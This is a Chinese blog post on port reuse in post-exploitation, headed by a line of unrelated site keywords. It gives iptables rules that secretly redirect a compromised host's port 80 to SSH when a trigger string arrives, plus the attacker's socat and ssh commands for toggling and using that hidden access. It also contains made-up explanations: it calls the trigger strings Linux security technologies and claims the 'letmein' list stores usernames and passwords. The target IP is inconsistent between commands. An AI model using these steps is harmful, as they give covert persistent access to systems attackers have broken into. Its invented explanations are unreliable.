怀化新站优化,网站建设工程师面试,怎样用ps做电子商务网站,餐饮 网站 模板作者名#xff1a;白昼安全主页面链接#xff1a; 主页传送门创作初心#xff1a; 以后赚大钱座右铭#xff1a; 不要让时代的悲哀成为你的悲哀专研方向#xff1a; web安全#xff0c;后渗透技术每日鸡汤#xff1a; 精彩的人生是在有限的生命中实现无限价值端口复用是…作者名白昼安全主页面链接 主页传送门创作初心 以后赚大钱座右铭 不要让时代的悲哀成为你的悲哀专研方向 web安全后渗透技术每日鸡汤 精彩的人生是在有限的生命中实现无限价值端口复用是指不同的应用程序使用相同端口进行通讯。我们可以通过端口复用来达到隐藏端口的目的。其他作用还有很多如内网渗透中搭建隧道时服务器仅允许指定的端口对外开放。利用端口复用可以将3389或22等端口转发到如80端口上以便外部连接。1. 利用IPTables进行端口复用假设主机开放的web服务是80端口在目标主机上执行如下命令# 创建端口复用链
iptables -t nat -N LETMEIN# 创建端口复用规则将流量转发至 22 端口
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22#开启开关如果接收到一个含有 threathuntercoming 的 TCP 包则将来源 IP 添加到加为 letmein 的列表中
iptables -A INPUT -p tcp -m string --string threathuntercoming --algo bm -m recent --set --name letmein --rsource -j ACCEPT#关闭开关如果接收到一个含有 threathunterleaving 的 TCP 包则将来源 IP 从 letmein 的列表中移除
iptables -A INPUT -p tcp -m string --string threathunterleaving --algo bm -m recent --name letmein --remove -j ACCEPT# lets do it如果发现 SYN 包的来源 IP 处于 letmein 列表中将跳转到 LETMEIN 链进行处理有效时间为 3600 秒
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEINThreatHunterLeaving是一种Linux安全技术它可以帮助系统管理员发现和响应潜在的安全威胁。它使用一系列的安全技术如防火墙入侵检测系统审计日志网络监控等来帮助系统管理员发现和响应潜在的安全威胁。ThreatHunterComing是一种Linux安全技术它可以帮助系统管理员预防和响应潜在的安全威胁。它使用一系列的安全技术如防火墙入侵检测系统审计日志网络监控等来帮助系统管理员预防和响应潜在的安全威胁。LetMeIn列表是一个安全白名单它包含了可以访问系统的IP地址用户名和密码。它可以帮助系统管理员控制哪些用户可以访问系统以及他们可以做什么。2、攻击者的linux系统上执行如下#开启复用,192.168.149.133为目标ip
echo threathuntercoming | socat - tcp:192.168.149.133:80#ssh使用80端口进行登录
ssh -p 80 root192.168.149.133 -T /bin/bash -i#关闭复用此时不能用80端口进行ssh连接
echo threathunterleaving | socat - tcp:192.168.110.131:80连接目标80端口成功连接sshps进行端口复用后同时也可以用默认的22端口进行ssh连接并不会影响
